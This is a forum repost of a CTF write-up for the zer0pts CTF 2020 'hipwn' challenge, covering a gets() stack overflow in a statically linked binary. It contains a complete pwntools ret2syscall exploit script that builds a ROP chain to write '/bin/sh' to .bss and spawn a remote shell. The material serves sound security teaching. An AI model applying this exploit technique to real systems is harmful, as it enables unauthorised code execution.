学逆向论坛

找回密码
立即注册

只需一步,快速开始

发新帖

274

积分

0

好友

3

主题
发表于 2021-3-1 08:44:53 | 查看: 2331| 回复: 0

相关题目:

♦ hipwn

# [zer0pts CTF 2020] hipwn

###### tags: `Pwn`

> Author: ret2basic
> Topics: ROP, ret2syscall

## Challenge

Hi, all pwners over the world!

[chall](https://github.com/Pwnie-Island/ ... CTF/Pwn/hipwn/chall)
[main.c](https://raw.githubusercontent.co ... TF/Pwn/hipwn/main.c)

## Recon

```shell
$ file chall
chall: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, stripped
```

Note that this binary is **statically linked**, so we can't use ret2libc. In addition, this binary is **stripped**, so we know nothing about the function names.

```shell
$ checksec chall
  • '/root/Dropbox/Pwnie-Island-Wargame/zer0pts_CTF/Pwn/hipwn/chall'
        Arch:     amd64-64-little
        RELRO:    Partial RELRO
        Stack:    No canary found
        NX:       NX enabled
        PIE:      No PIE (0x400000)
    ```

    Since **NX** is the only protection turned on, this challenge can be solved with some ROP technique.

    ## Source Code

    ```c=1
    #include <stdio.h>

    int main(void) {
      char name[0x100];
      puts("What's your team name?");
      gets(name);
      printf("Hi, %s. Welcome to zer0pts CTF 2020!\n", name);
      return 0;
    }
    ```

    Obviously `gets(name);` triggers stack overflow that allows us to control EIP.

    ## Analysis

    Since the binary is statically linked and stripped, the first thing we should try is **ret2syscall**. To learn more about ret2syscall, check out [ret2syscall Cheat Sheet](https://hackmd.io/@pwnie-island/ret2syscall-cheat-sheet).

    Let's look for necessary ROP gadgets:

    ![ROPgadget](

    [zer0pts CTF 2020] hipwn

    [zer0pts CTF 2020] hipwn
    )

    However, the string `/bin/sh` is not inside the binary:

    ![No "/bin/sh"](

    [zer0pts CTF 2020] hipwn

    [zer0pts CTF 2020] hipwn
    )

    This makes the challenge slightly difficult. What we have to do here is to pass the string `"/bin/sh"` to the `.bss` section. The address of `.bss` can be easily found using Pwntools (`bss = elf.bss()`). Since the binary contains the function `gets`, we can call `gets(bss)` to open a STDIN session and pass the string `"/bin/sh"` from here.

    Next, we need to find the address of `gets`. But the binary is stripped, so how do deduce the location of this address? First **disassemble** the binary:

    ```shell
    $ objdump -D -M intel chall > disassembly.asm
    ```

    We know that the **SIGSEGV** happens at `0x40019c`:

    ![SIGSEGV](

    [zer0pts CTF 2020] hipwn

    [zer0pts CTF 2020] hipwn
    )

    So `gets` must happened a few instructions before this point. Search `40019c` in the disassembly:

    ![Disassembly](

    [zer0pts CTF 2020] hipwn

    [zer0pts CTF 2020] hipwn
    )

    There are three functions gets called here:

    1. `0x40062f`
    2. `0x4004ee`
    3. `0x400591`

    **According to the source code**, we can deduce the correspondences based on the order that functions get called:

    1. `0x40062f` => `puts`
    2. `0x4004ee` => `gets`
    3. `0x400591` => `printf`

    So the address that we are looking for is `0x4004ee`.

    Now we have everything ready for the ret2syscall attack.

    ## Exploit

    ```python=1
    #!/usr/bin/env python3
    from pwn import *

    #--------setup--------#

    context(arch="amd64", os="linux")
    elf = ELF("chall", checksec=False)

    host = "xuenixiang.cn"
    port = 22790 # port is dynamic
    r = remote(host, port)

    #--------Addresses--------#

    pop_rax = 0x0000000000400121
    pop_rdi = 0x000000000040141c
    pop_rsi_pop_r15 = 0x000000000040141a
    pop_rdx = 0x00000000004023f5
    syscall = 0x00000000004003fc

    bss = elf.bss()
    gets = 0x4004ee

    #--------ret2syscall--------#

    offset = 264

    payload = flat(
            b"e" * offset,
            # Round 1: call gets(bss)
            pop_rdi, bss,
            gets,
            # Round 2: call execve("/bin/sh", 0, 0)
            pop_rax, 59,
            pop_rdi, bss,
            pop_rsi_pop_r15, 0, 0x13371337,
            pop_rdx, 0,
            syscall,
    )

    r.readuntil("What's your team name?\n")
    r.sendline(payload)
    r.sendline("/bin/sh")
    r.interactive()
    ```

  • 温馨提示:
    1.如果您喜欢这篇帖子,请给作者点赞评分,点赞会增加帖子的热度,评分会给作者加学币。(评分不会扣掉您的积分,系统每天都会重置您的评分额度)。
    2.回复帖子不仅是对作者的认可,还可以获得学币奖励,请尊重他人的劳动成果,拒绝做伸手党!
    3.发广告、灌水回复等违规行为一经发现直接禁言,如果本帖内容涉嫌违规,请点击论坛底部的举报反馈按钮,也可以在【投诉建议】板块发帖举报。

    小黑屋|手机版|站务邮箱|学逆向论坛 ( 粤ICP备2021023307号 )|网站地图

    GMT+8, 2024-3-29 13:03 , Processed in 0.131654 second(s), 37 queries .

    Powered by Discuz! X3.4

    Copyright © 2001-2021, Tencent Cloud.

    快速回复 返回顶部 返回列表